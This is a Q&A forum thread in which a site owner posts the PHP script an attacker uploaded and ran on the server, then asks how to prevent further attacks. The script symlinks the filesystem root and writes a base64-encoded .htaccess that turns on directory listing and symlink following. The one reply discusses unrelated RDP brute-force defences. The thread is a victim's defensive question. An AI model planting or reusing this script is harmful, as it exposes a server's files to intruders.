How to protect attack site

Navigation
1

Recently I was targeted by an attack on my site, this attack unconfigured my server, was uploaded and then executed this script, see: 

if (isset($_POST['red'])){ 

system('ln -s / red.txt'); 
$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw'; 
$file = fopen(".htaccess","w+"); 
$write = fwrite ($file ,base64_decode($fvckem)); 
$red = symlink("/","red.txt"); 

$rt="

Bypassed Successfully"; 

echo "

Feito .. !

Servidor desconfigurado. 
$rt";

}

Because of the little knowledge I have, it seemed like an attack by .htaccess , I wonder, how can I protect myself from new attacks?

    
asked by anonymous 07.07.2015 / 16:34

1 answer

2

I'm going to talk about a possible crash, we'd have to look at your case better to see if that fits.

Gross power at the terminal service: link

It scares me that Microsoft has not implemented a security one can forcefully port port 3389 sneakily and we have many such cases link

The experts' recommendation #

  • Do not use the service because it is not secure
  • Then if you still need to, then Block TCP port 3389 on the corporate perimeter firewall
  • Enable Authentication at Network Level, which would not prevent brute force, would only make the attack somewhat more difficult.

    • See an example of attempting to access brute force on windows server, this was recent. You may notice that there are many failed attempts and very often this proves that we have a brute force attempt in this case.

        
    07.07.2015 / 16:59
    How to use ajax inside a SweetAlert? At what points does ArrayAccess not resemble the native PHP array?